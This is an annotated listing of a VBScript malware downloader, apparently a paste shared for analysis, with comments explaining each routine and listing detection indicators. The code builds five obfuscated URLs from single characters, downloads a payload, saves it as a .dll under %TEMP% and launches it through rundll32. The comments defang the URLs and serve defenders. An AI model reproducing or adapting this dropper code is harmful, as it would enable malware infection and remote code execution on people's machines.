
Malicious script

dynamoo Oct 28th, 2016 191 Never
  ' Script-wide setup. "On Error Resume Next" at this level means a run-time error in the
  ' top-level code (or one propagating out of a called procedure) does not stop the script;
  ' the main loop further down tests Err.Number instead.
  1. On Error Resume Next
  ' Kq2, Bl0, Ni and RFl1 are not referenced anywhere in the visible listing.
  2. Const Kq2 = 1, Bl0 = 2, Ni = 8
  ' Eb is assigned to ADODB.Stream.Type (2 = adTypeText); Wl4 is the SaveToFile option
  ' (2 = adSaveCreateOverWrite).
  3. Const RFl1 = 1, Eb = 2, Wl4 = 2
  ' Charset name given to ADODB.Stream: code page 437.
  4. Const Fy = "437"
  ' RSb6(Tv3): converts an array of byte values (0-255) into a string, one character per byte.
  ' Values below 128 are used as the code point directly; values 128-255 are mapped through
  ' XSf to the Unicode code point of the matching code page 437 character. Written back out
  ' through a text-mode stream with Charset "437" (see So), such a string should encode to
  ' the original byte values - the script's way of writing binary data from VBScript.
  ' Raises error 50003 when an element lies outside 0-255. Returns the string built in UYz.
  5. Function RSb6(Tv3)
  6. Dim XSf(255), UYz, VEk8
  ' Lookup table: index = byte value 128-255, value = Unicode code point (entries 0-127 stay unset).
  7. XSf(128)=199
  8. XSf(129)=252
  9. XSf(130)=233
  10. XSf(131)=226
  11. XSf(132)=228
  12. XSf(133)=224
  13. XSf(134)=229
  14. XSf(135)=231
  15. XSf(136)=234
  16. XSf(137)=235
  17. XSf(138)=232
  18. XSf(139)=239
  19. XSf(140)=238
  20. XSf(141)=236
  21. XSf(142)=196
  22. XSf(143)=197
  23. XSf(144)=201
  24. XSf(145)=230
  25. XSf(146)=198
  26. XSf(147)=244
  27. XSf(148)=246
  28. XSf(149)=242
  29. XSf(150)=251
  30. XSf(151)=249
  31. XSf(152)=255
  32. XSf(153)=214
  33. XSf(154)=220
  34. XSf(155)=162
  35. XSf(156)=163
  36. XSf(157)=165
  37. XSf(158)=8359
  38. XSf(159)=402
  39. XSf(160)=225
  40. XSf(161)=237
  41. XSf(162)=243
  42. XSf(163)=250
  43. XSf(164)=241
  44. XSf(165)=209
  45. XSf(166)=170
  46. XSf(167)=186
  47. XSf(168)=191
  48. XSf(169)=8976
  49. XSf(170)=172
  50. XSf(171)=189
  51. XSf(172)=188
  52. XSf(173)=161
  53. XSf(174)=171
  54. XSf(175)=187
  55. XSf(176)=9617
  56. XSf(177)=9618
  57. XSf(178)=9619
  58. XSf(179)=9474
  59. XSf(180)=9508
  60. XSf(181)=9569
  61. XSf(182)=9570
  62. XSf(183)=9558
  63. XSf(184)=9557
  64. XSf(185)=9571
  65. XSf(186)=9553
  66. XSf(187)=9559
  67. XSf(188)=9565
  68. XSf(189)=9564
  69. XSf(190)=9563
  70. XSf(191)=9488
  71. XSf(192)=9492
  72. XSf(193)=9524
  73. XSf(194)=9516
  74. XSf(195)=9500
  75. XSf(196)=9472
  76. XSf(197)=9532
  77. XSf(198)=9566
  78. XSf(199)=9567
  79. XSf(200)=9562
  80. XSf(201)=9556
  81. XSf(202)=9577
  82. XSf(203)=9574
  83. XSf(204)=9568
  84. XSf(205)=9552
  85. XSf(206)=9580
  86. XSf(207)=9575
  87. XSf(208)=9576
  88. XSf(209)=9572
  89. XSf(210)=9573
  90. XSf(211)=9561
  91. XSf(212)=9560
  92. XSf(213)=9554
  93. XSf(214)=9555
  94. XSf(215)=9579
  95. XSf(216)=9578
  96. XSf(217)=9496
  97. XSf(218)=9484
  98. XSf(219)=9608
  99. XSf(220)=9604
  100. XSf(221)=9612
  101. XSf(222)=9616
  102. XSf(223)=9600
  103. XSf(224)=945
  104. XSf(225)=223
  105. XSf(226)=915
  106. XSf(227)=960
  107. XSf(228)=931
  108. XSf(229)=963
  109. XSf(230)=181
  110. XSf(231)=964
  111. XSf(232)=934
  112. XSf(233)=920
  113. XSf(234)=937
  114. XSf(235)=948
  115. XSf(236)=8734
  116. XSf(237)=966
  117. XSf(238)=949
  118. XSf(239)=8745
  119. XSf(240)=8801
  120. XSf(241)=177
  121. XSf(242)=8805
  122. XSf(243)=8804
  123. XSf(244)=8992
  124. XSf(245)=8993
  125. XSf(246)=247
  126. XSf(247)=8776
  127. XSf(248)=176
  128. XSf(249)=8729
  129. XSf(250)=183
  130. XSf(251)=8730
  131. XSf(252)=8319
  132. XSf(253)=178
  133. XSf(254)=9632
  134. XSf(255)=160
  ' s is assigned here but never read; the result is accumulated in UYz, which starts out Empty.
  135. s = ""
  136. For VEk8 = 0 To UBound(Tv3)
  137. If Tv3(VEk8) < 0 Or Tv3(VEk8) > 255 Then
  ' Element is not a byte value: raise error 50003 with the description "a2s()".
  138. Err.Raise 50003, "", "a2s()", "", 0
  139. ElseIf Tv3(VEk8) >= 128 Then
  ' High half: translate through the table.
  140. UYz = UYz & ChrW(XSf(Tv3(VEk8)))
  141. Else
  ' Low half (0-127): the byte value is used as the code point unchanged.
  142. UYz = UYz & ChrW(Tv3(VEk8))
  143. End If
  144. Next
  145. RSb6 = UYz
  146. End Function
  ' Nu3(OPb): reads the file at path OPb as text through ADODB.Stream (Type = Eb, Charset = Fy)
  ' and returns WFo3 applied to that text.
  ' WFo3 is not defined in the visible listing and Nu3 is not called from it, so this looks
  ' like leftover code from a shared template. PTi is declared but unused.
  147. Function Nu3(OPb)
  148. Dim Xj, PTi, UYz
  149. Set Xj = CreateObject("ADODB.Stream")
  150. Xj.type = Eb
  151. Xj.Charset = Fy
  152. Xj.Open
  153. Xj.LoadFromFile OPb
  154. UYz = Xj.ReadText
  155. Xj.Close
  156. Nu3 = WFo3(UYz)
  157. End Function
  ' So OPb, Tv3: writes the byte-value array Tv3 to the file OPb. The array is turned into a
  ' string by RSb6 and written through a text-mode ADODB.Stream with Charset = Fy ("437").
  ' The main routine calls this to put the downloaded content on disk.
  158. Sub So(OPb, Tv3)
  159. Dim Xj, UYz
  160. Set Xj = CreateObject("ADODB.Stream")
  161. Xj.type = Eb
  162. Xj.Charset = Fy
  163. Xj.Open
  164. UYz = RSb6(Tv3)
  165. Xj.WriteText UYz
  ' Wl4 = 2: an existing file at OPb is overwritten.
  166. Xj.SaveToFile OPb, Wl4
  167. Xj.Close
  168. End Sub
  ' PKe(Iu7): returns a zero-based array with Iu7 elements, used by the script as a buffer
  ' that callers fill in afterwards. Raises error 50001 when Iu7 is zero or negative.
  169. Function PKe(Iu7)
  170. Dim UYz, LVb(0)
  171. If Iu7 <= 0 Then
  172. Err.Raise 50001, "", "makearrr()", "", 0
  173. ElseIf Iu7 = 1 Then
  ' One element: return the fixed one-element array.
  174. PKe = LVb
  175. Else
  ' Splitting Iu7-1 spaces on " " yields Iu7 empty strings, i.e. an array of the requested length.
  176. UYz = Space(Iu7-1)
  177. PKe = Split(UYz, " ")
  178. End If
  179. End Function
  ' THv7(url): fetches url with a synchronous HTTP GET and returns the response body as an
  ' array of byte values (one element per byte).
  ' The HTTP object is WinHttp.WinHttpRequest.5.1, with MSXML2.XMLHTTP as the intended fallback.
  ' NOTE(review): no "On Error Resume Next" is visible inside this procedure, so a failing
  ' CreateObject would leave the procedure rather than reach the Err.Number test - confirm.
  ' Nothing here checks the HTTP status or the content of the response.
  ' HWy (a FileSystemObject) is created but not used.
  180. Function THv7(url)
  181. Dim HWy, IWu8, PTi, VEk8
  182. Dim Ze, BLm3(1)
  183. Set HWy = CreateObject("Scripting.FileSystemObject")
  184. BLm3(0) = "WinHttp.WinHttpRequest.5.1"
  185. BLm3(1) = "MSXML2.XMLHTTP"
  186. For Each Ze in BLm3
  187. Err.Clear
  188. Set IWu8 = CreateObject(Ze)
  189. If Err.Number = 0 Then
  190. Exit For
  191. End If
  192. Next
  ' Third argument False = the request is not asynchronous; Send returns when the response is in.
  193. IWu8.Open "GET", url, False
  194. IWu8.Send
  ' Allocate one array element per response byte, then copy the body byte by byte.
  195. PTi = PKe(LenB(IWu8.ResponseBody))
  196. For VEk8 = 1 To LenB(IWu8.ResponseBody)
  197. PTi(VEk8-1) = AscB(MidB(IWu8.ResponseBody, VEk8, 1))
  198. Next
  199. THv7 = PTi
  200. End Function
  ' Re1(): returns the full path of the rundll32.exe to use. It reads PROCESSOR_ARCHITECTURE
  ' from the System environment and picks %SystemRoot%\SysWOW64\rundll32.exe when the value
  ' is "amd64" (case-insensitive), otherwise %SystemRoot%\system32\rundll32.exe.
  ' NOTE(review): choosing the SysWOW64 copy on 64-bit systems suggests the DLL is 32-bit - confirm.
  201. Function Re1()
  202. Dim IRj, Ji, UUr5
  203. Set IRj = CreateObject("WScript.Shell")
  204. Set Ji = IRj.Environment("System")
  205. UUr5 = Ji("PROCESSOR_ARCHITECTURE")
  206. If LCase(UUr5) = "amd64" Then
  207. Re1 = IRj.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
  208. Else
  209. Re1 = IRj.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
  210. End If
  211. End Function
  ' LBd Ix, Lw1, Ut: starts rundll32 on the file Ix. The command line is
  ' "<rundll32 path from Re1> <short path of Ix>,<Lw1> <Ut>", so Lw1 is the export name and
  ' Ut the argument text that follows it. The command is started with WScript.Shell.Run.
  ' For detection: the result is a script host process with rundll32.exe as its child.
  212. Sub LBd(Ix, Lw1, Ut)
  213. Dim IRj, HWy, Mm, MOd4, KNf
  214. Set IRj = CreateObject("WScript.Shell")
  215. Set HWy = CreateObject("Scripting.FileSystemObject")
  ' GetFile needs Ix to exist; its ShortPath (8.3 form) is what goes on the command line.
  216. Set Mm = HWy.GetFile(Ix)
  217. MOd4 = Mm.ShortPath
  218. KNf = Re1() + " " + MOd4 + "," + Lw1 + " " + Ut
  ' "2 > 1" is always true; the condition has no effect on behaviour.
  219. If 2 > 1 Then
  220. IRj.Run(KNf)
  221. End If
  222. End Sub
  ' Ty(Ix): returns True when a file exists at path Ix (FileSystemObject.FileExists).
  223. Function Ty(Ix)
  224. Dim HWy
  225. Set HWy = CreateObject("Scripting.FileSystemObject")
  226. Ty = HWy.FileExists(Ix)
  227. End Function
  ' Ex6(Ix): returns the short (8.3) path of the existing file Ix, as reported by
  ' FileSystemObject.GetFile(...).ShortPath.
  228. Function Ex6(Ix)
  229. Dim HWy, Mm
  230. Set HWy = CreateObject("Scripting.FileSystemObject")
  231. Set Mm = HWy.GetFile(Ix)
  232. Ex6 = Mm.ShortPath
  233. End Function
  ' BWg(KQg2, Rd0): floating-point remainder, computed as KQg2 - Int(KQg2 / Rd0) * Rd0 on
  ' Double values. Vu calls it with Rd0 = 1.0 to keep the fractional part of a sum.
  234. Function BWg(KQg2, Rd0)
  235. Dim Iu7
  ' Iu7 = whole number of times Rd0 fits into KQg2.
  236. Iu7 = CDbl(Int(CDbl(KQg2)/CDbl(Rd0)))
  237. BWg = CDbl(KQg2) - Iu7 * CDbl(Rd0)
  238. End Function
  ' Vu(BBa, UYz): one step of a three-part pseudo-random generator. UYz is a three-element
  ' state array that is updated in place; the multipliers and moduli (171/30269, 172/30307,
  ' 170/30323) are those of the Wichmann-Hill generator. Returns an integer from 0 to BBa-1.
  ' Kx uses it with BBa = 256 to produce one keystream byte per call.
  239. Function Vu(BBa, UYz)
  240. UYz(1) = 172 * UYz(1) Mod 30307
  241. UYz(0) = 171 * UYz(0) Mod 30269
  242. UYz(2) = 170 * UYz(2) Mod 30323
  243. Dim Xf3
  ' Sum the three scaled states and keep only the fractional part (a value in [0, 1)).
  244. Xf3 = BWg((CDbl(UYz(0))/30269.0 + CDbl(UYz(1))/30307.0 + CDbl(UYz(2))/30323.0), 1.0)
  245. Vu = Int(Xf3 * CDbl(BBa))
  246. End Function
  ' Kx(PTi, RBu): decodes a downloaded byte array. Every element of PTi is XORed (in place)
  ' with a keystream byte from Vu, seeded with the three values in RBu. The last four decoded
  ' bytes are read as a little-endian checksum; the bytes before them are the payload.
  ' Raises 50004 when PTi has fewer than four elements and 50005 when the checksum does not
  ' match. Returns the payload (PTi without its last four bytes).
  ' In this listing the only call to Kx is commented out in the main routine.
  247. Function Kx(PTi, RBu)
  248. Dim PIq5(2), Pj1, Zi, Ya2, VEk8
  249. If UBound(PTi) < 3 Then
  250. Err.Raise 50004, "", "size of array muzt be >= 4", "", 0
  251. End If
  ' Output buffer: four elements shorter than the input.
  252. Pj1 = PKe(UBound(PTi) - 3)
  ' Work on a copy of the seed so the caller's RBu array is not changed by Vu.
  253. PIq5(0) = RBu(0)
  254. PIq5(1) = RBu(1)
  255. PIq5(2) = RBu(2)
  256. For VEk8 = 0 To UBound(PTi)
  257. PTi(VEk8) = PTi(VEk8) Xor Vu(256, PIq5)
  258. Next
  ' Expected checksum: the last four decoded bytes, least significant byte first.
  259. Zi = PTi(UBound(PTi)-3)+(PTi(UBound(PTi)-2)*256)+(PTi(UBound(PTi)-1)*256*256)+(PTi(UBound(PTi))*256*256*256)
  ' Computed checksum starts from the script-level value VUf9 and adds each payload byte,
  ' reduced modulo 1000000000.
  260. Ya2 = VUf9
  261. For VEk8 = 0 To UBound(Pj1)
  262. Pj1(VEk8) = PTi(VEk8)
  263. Ya2 = (Ya2 + PTi(VEk8)) Mod 1000000000
  264. Next
  265. If Ya2 <> Zi Then
  266. Err.Raise 50005, "", "checksum error", "", 0
  267. End If
  268. Kx = Pj1
  269. End Function
  ' GEq(TOv6): returns a random integer. Rnd() is in [0, 1) and CInt rounds to the nearest
  ' integer, so the result lies between 0 and TOv6 inclusive. The main routine uses it to
  ' pick an index into the URL array.
  270. Function GEq(TOv6)
  271. GEq = CInt(TOv6*Rnd())
  272. End Function
  ' Hx Oi: pauses the script for Oi milliseconds (WScript.Sleep).
  273. Sub Hx(Oi)
  274. WScript.Sleep(Oi)
  275. End Sub
  ' Configuration for the main routine: decode key, checksum start value, download URLs and
  ' the base name of the file written to disk.
  276. Randomize  ' seeds Rnd(), which GEq uses to pick a download URL
  277. Dim WQa2(2), VUf9, VIb(4), OPb
  ' WQa2: the three seed values that the commented-out Kx call would pass as its key.
  278. WQa2(0) = 6575
  279. WQa2(1) = 24677
  280. WQa2(2) = 15342
  281. VUf9 = 46  ' starting value of the checksum computed in Kx
  ' Five download URLs, each assembled from single-character pieces so that the full string
  ' never appears in the file; the "If 1=1" wrappers are always true. Defanged, they read:
  '   hxxp://angundoviz[.]com/lhk96wx
  '   hxxp://a1plus2[.]de/ljwxw6vh
  '   hxxp://enzyma[.]es/lpzd1gev
  '   hxxp://zlotysalmo[.]net/0zx0ken3
  '   hxxp://aoteatrial[.]net/142y5x
  282. If 1=1 Then
  283. VIb(0) = "http://" & "a" & "n" & "g" & "u" & "n" & "d" & "o" & "v" & "i" & "z" & "." & "c" & "o" & "m" & "/" & "l" & "h" & "k" & "9" & "6" & "w" & "x"
  284. End If
  285. If 1=1 Then
  286. VIb(1) = "http://" & "a" & "1" & "p" & "l" & "u" & "s" & "2" & "." & "d" & "e" & "/" & "l" & "j" & "w" & "x" & "w" & "6" & "v" & "h"
  287. End If
  288. If 1=1 Then
  289. VIb(2) = "http://" & "e" & "n" & "z" & "y" & "m" & "a" & "." & "e" & "s" & "/" & "l" & "p" & "z" & "d" & "1" & "g" & "e" & "v"
  290. End If
  291. If 1=1 Then
  292. VIb(3) = "http://" & "z" & "l" & "o" & "t" & "y" & "s" & "a" & "l" & "m" & "o" & "." & "n" & "e" & "t" & "/" & "0" & "z" & "x" & "0" & "k" & "e" & "n" & "3"
  293. End If
  294. If 1=1 Then
  295. VIb(4) = "http://" & "a" & "o" & "t" & "e" & "a" & "t" & "r" & "i" & "a" & "l" & "." & "n" & "e" & "t" & "/" & "1" & "4" & "2" & "y" & "5" & "x"
  296. End If
  ' Base name of the file written under %TEMP%; the main routine appends a number and ".dll".
  297. OPb = "vJlvsuTTmqgiF"
  ' Main routine: download one file, save it as a .dll under %TEMP%, and load it with rundll32.
  ' Behaviour a defender can look for, all taken from the lines below: a script host making a
  ' plain-HTTP GET to one of the URLs in VIb, a file %TEMP%\vJlvsuTTmqgiF<0-10>.dll being
  ' written, and rundll32.exe started on that file with the export name
  ' "EnhancedStoragePasswordConfig" followed by the argument 147.
  298. Dim IRj, Lv, Ov6, Wg
  ' objShell is never declared (the script has no Option Explicit); IRj is declared but unused here.
  299. Set objShell = CreateObject("WScript.Shell")
  ' "%TEMP%" is written in two pieces, so the literal does not appear in the file.
  300. Lv = objShell.ExpandEnvironmentStrings("%" & "TEMP%")
  301. Dim Ag, AKw8, Ab7, Hk, VEk8
  302. AKw8 = False  ' becomes True once a download has been saved
  ' Up to 11 passes. "Do ... Loop While False" runs its body once, so each "Exit Do" below
  ' abandons the current pass and moves on to the next value of VEk8.
  303. For VEk8=0 To 10: Do
  304. Ov6 = Lv + "\" + OPb + CStr(VEk8) + ".dll"
  ' If this pass's .dll and a "<short path>.txt" file both exist, exit with code 0.
  ' NOTE(review): this script never writes the .txt file; presumably the DLL creates it as a
  ' marker that it has run - confirm.
  305. If Ty(Ov6) Then
  306. Wg = Ex6(Ov6) & ".txt"
  307. If Ty(Wg) Then
  308. WScript.Quit(0)
  309. End If
  310. End If
  ' Download step, attempted until one download has been saved.
  311. If Not AKw8 Then
  ' Pick one of the five URLs at random and fetch it.
  312. Ag = GEq(UBound(VIb))
  313. Ab7 = THv7(VIb(Ag))
  314. If Err.Number <> 0 Then
  315. Exit Do
  316. End If
  ' The response is used as received: the Kx decode/checksum call is commented out.
  317. Hk = Ab7  ' Kx(Ab7, WQa2)
  318. If Err.Number <> 0 Then
  319. Exit Do
  320. End If
  ' Write the bytes to %TEMP%\<OPb><VEk8>.dll.
  321. So Ov6, Hk
  322. If Err.Number <> 0 Then
  323. Exit Do
  324. End If
  325. AKw8 = True
  326. End If
  ' Load the file through rundll32; the export name is split in two string pieces.
  ' NOTE(review): on passes after the successful download, Ov6 names a file this run did not
  ' write, so LBd's GetFile would be expected to fail there - confirm by tracing.
  327. LBd Ov6, "E"&"nhancedStoragePasswordConfig", "147"
  ' Wait 24899 ms before the next pass.
  328. Hx 24899
  329. Loop While False: Next
  ' "3=3" is always true: the script ends with exit code 1 once the loop is finished.
  330. If 3=3 Then
  331. WScript.Quit(1)
  332. End If